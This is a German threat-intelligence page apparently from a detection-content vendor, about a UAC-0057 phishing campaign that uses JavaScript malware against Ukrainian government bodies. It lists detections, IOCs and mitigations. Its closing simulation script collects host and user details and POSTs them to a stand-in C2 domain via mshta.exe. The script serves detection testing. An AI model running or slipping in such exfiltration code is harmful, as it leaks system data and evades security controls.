SOC Prime Bias: Mittel

22 May 2026 12:56 UTC

UAC-0057 aktualisiert sein Toolkit mit OYSTERFRESH, OYSTERSHUCK und OYSTERBLUES

Author Photo
SOC Prime Team linkedin icon Folgen
UAC-0057 aktualisiert sein Toolkit mit OYSTERFRESH, OYSTERSHUCK und OYSTERBLUES
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

CERT-UA hat eine Phishing-Kampagne gegen ukrainische Regierungsorganisationen gemeldet. Die E-Mails enthalten PDF-Anhänge, die Empfänger zu ZIP-Archiven weiterleiten, die bösartige JavaScript-Dateien namens OYSTERFRESH, OYSTERSHUCK und OYSTERBLUES enthalten. Nach der Ausführung sammelt die Malware Systeminformationen und sendet diese über HTTP-POST-Anfragen hinaus mit der Möglichkeit, eine Cobalt Strike-Komponente zu einem späteren Zeitpunkt abzurufen. Die unterstützende Infrastruktur ist hinter Cloudflare verborgen und nutzt ausgiebig .icu Domains.

Untersuchung

Die Analyse von CERT-UA identifizierte die bösartigen JavaScript-Beispiele, die Dekodierungsmethoden, auf die sie sich stützen, einschließlich der Umkehrung von Zeichenfolgen, ROT13 und URL-Dekodierung, sowie die Registry-Änderungen, die zur Aufrechterhaltung der Persistenz verwendet werden. Die Ermittler dokumentierten auch mehrere Datei-Artefakte und Windows-Pfade, die mit der Infektionskette verbunden sind. Die Netzwerk-Analyse verknüpfte die Aktivitäten mit Cloudflare-geschützter .icu Hosting-Infrastruktur. Der Bericht weist außerdem auf die mögliche nachfolgende Lieferung eines Cobalt Strike-Beacon hin.

Abschwächung

Organisationen sollten wscript.exe Ausführung für Standardbenutzer einschränken, sowohl PowerShell- als auch JavaScript-Ausführungen begrenzen und die aufgeführten Registry-Run-Keys auf verdächtige Änderungen überwachen. Webfiltering sollte verwendet werden, um .icu Domains zu blockieren und gegebenenfalls Cloudflare-bezogene IP-Bereiche zu blockieren, die mit der Kampagne verbunden sind. Verteidiger sollten auch minimal-priviligierte Kontrollen anwenden und die automatische Ausführung unbekannter Binärdateien verhindern.

Reaktion

Sicherheitsteams sollten Erkennungen für die identifizierten Dateinamen, Registry-Keys und ausgehenden HTTP-POST-Verkehr zu den bekannten Domains erstellen. Die Jagd sollte auch den möglichen Cobalt Strike-Payload abdecken, einschließlich der CSBEACON DLL, und alle geplanten Aufgaben namens MicrosoftEdgeUpdateTaskMachine. Endpoint-Untersuchungen sollten Prozessbäume sammeln, um die JavaScript-Dekodierungs- und Ausführungskette nachzuverfolgen.

Angriffsfluss

Erkennungen

Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (via registry_event)

SOC Prime Team
22. Mai 2026

Verdächtige Dateierweiterungen, die zu Run-Keys hinzugefügt wurden [ASEPs] (via registry_event)

SOC Prime Team
22. Mai 2026

Extraktion von Archiven direkt aus dem E-Mail-Client (via process_creation)

SOC Prime Team
22. Mai 2026

Ausführung aus ZIP-Archiv [7zip] (via process_creation)

SOC Prime Team
22. Mai 2026

Ausführung aus RAR-Archiv [WinRAR] (via process_creation)

SOC Prime Team
22. Mai 2026

LOLBAS WScript/CScript (via process_creation)

SOC Prime Team
22. Mai 2026

LOLBAS RunDLL32 (via cmdline)

SOC Prime Team
22. Mai 2026

Verdächtige extrahierte Dateien aus einem Archiv (via file_event)

SOC Prime Team
22. Mai 2026

Verdächtige geplante Aufgabe (via audit)

SOC Prime Team
22. Mai 2026

Verdächtige Kommando- und Kontrollanfragen durch ungewöhnliche Top-Level-Domain- (TLD) DNS-Anfragen (via dns)

SOC Prime Team
22. Mai 2026

IOCs (SHA256) zur Erkennung: Aktualisiertes Toolkit UAC-0057: OYSTERFRESH, OYSTERSHUCK und OYSTERBLUES Teil 2

SOC Prime AI-Regeln
22. Mai 2026

IOCs (SHA256) zur Erkennung: Aktualisiertes Toolkit UAC-0057: OYSTERFRESH, OYSTERSHUCK und OYSTERBLUES Teil 1

SOC Prime AI-Regeln
22. Mai 2026

IOCs (SHA1) zur Erkennung: Aktualisiertes Toolkit UAC-0057: OYSTERFRESH, OYSTERSHUCK und OYSTERBLUES

SOC Prime AI-Regeln
22. Mai 2026

IOCs (MD5) zur Erkennung: Aktualisiertes Toolkit UAC-0057: OYSTERFRESH, OYSTERSHUCK und OYSTERBLUES Teil 2

SOC Prime AI-Regeln
22. Mai 2026

IOCs (MD5) zur Erkennung: Aktualisiertes Toolkit UAC-0057: OYSTERFRESH, OYSTERSHUCK und OYSTERBLUES Teil 1

SOC Prime AI-Regeln
22. Mai 2026

IOCs (SourceIP) zur Erkennung: Aktualisiertes Toolkit UAC-0057: OYSTERFRESH, OYSTERSHUCK und OYSTERBLUES

SOC Prime AI-Regeln
22. Mai 2026

IOCs (DestinationIP) zur Erkennung: Aktualisiertes Toolkit UAC-0057: OYSTERFRESH, OYSTERSHUCK und OYSTERBLUES

SOC Prime AI-Regeln
22. Mai 2026

Erkennung der OYSTERBLUES-Exfiltration via HTTP-POST an .icu-Domains [Windows Netzwerkverbindung]

SOC Prime AI-Regeln
22. Mai 2026

Erkennung der Ausführung bösartiger JavaScripts via wscript.exe [Windows-Prozesserstellung]

SOC Prime AI-Regeln
22. Mai 2026

Simulation Ausführung

Voraussetzung: Der Telemetrie- & Baseline-Vorab-Check muss bestanden sein.

Begründung: In diesem Abschnitt wird die genaue Ausführung der Technik des Angreifers (TTP) detailliert, die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählungen spiegeln unmittelbar die identifizierten TTPs wider und erzeugen die genaue Telemetrie, die von der Erkennungslogik erwartet wird.

  • Angriffserzählung & Befehle:
    Der Angreifer nutzt eine signierte Windows-Binärdatei (mshta.exe) um eine kleine JavaScript-Nutzlast auszuführen, die Systeminformationen sammelt und über eine HTTP POST an eine bösartige „*.icu“ Domain überträgt, die vom C2-Server kontrolliert wird. Dieser „living-off-the-land“ Ansatz vermeidet das Auslösen von Virenschutzwarnungen, während das genaue Firewallevent generiert wird, das die Regel überwacht (POST + „.icu“).

  • Regressionstest-Skript:

    # OYSTERBLUES-Stil-Exfiltrationssimulation
    # 1. Minimale Systeminformationen in JSON kodieren
    $info = @{
        hostname = $env:COMPUTERNAME
        user     = $env:USERNAME
        os       = (Get-CimInstance -ClassName Win32_OperatingSystem).Caption
    } | ConvertTo-Json -Compress
    
    # 2. Temporäre HTML-Datei schreiben, die einen JS-Fetch-POST ausführt
    $htmlPath = "$env:TEMPexfil.html"
    $js = @"
      var data = '$info';
      fetch('http://malicious-c2.abc.icu/collect', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: data
      });
    "@
    Set-Content -Path $htmlPath -Value "<script>$js</script>" -Encoding ASCII
    
    # 3. Ausführung via mshta (signierte Binärproxy-Ausführung)
    Start-Process -FilePath "$env:SystemRootSystem32mshta.exe" -ArgumentList "`"$htmlPath`""
    
    # 4. Geben Sie der Anfrage Zeit zum Abschließen und bereinigen Sie dann
    Start-Sleep -Seconds 5
    Remove-Item -Path $htmlPath -Force
  • Cleanup-Befehle:

    # Sicherstellen, dass verbleibende mshta-Prozesse beendet werden
    Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Restliche temporäre Dateien löschen (falls vorhanden)
    $tempFiles = Get-ChildItem -Path $env:TEMP -Filter "exfil.html"
    foreach ($file in $tempFiles) { Remove-Item $file.FullName -Force }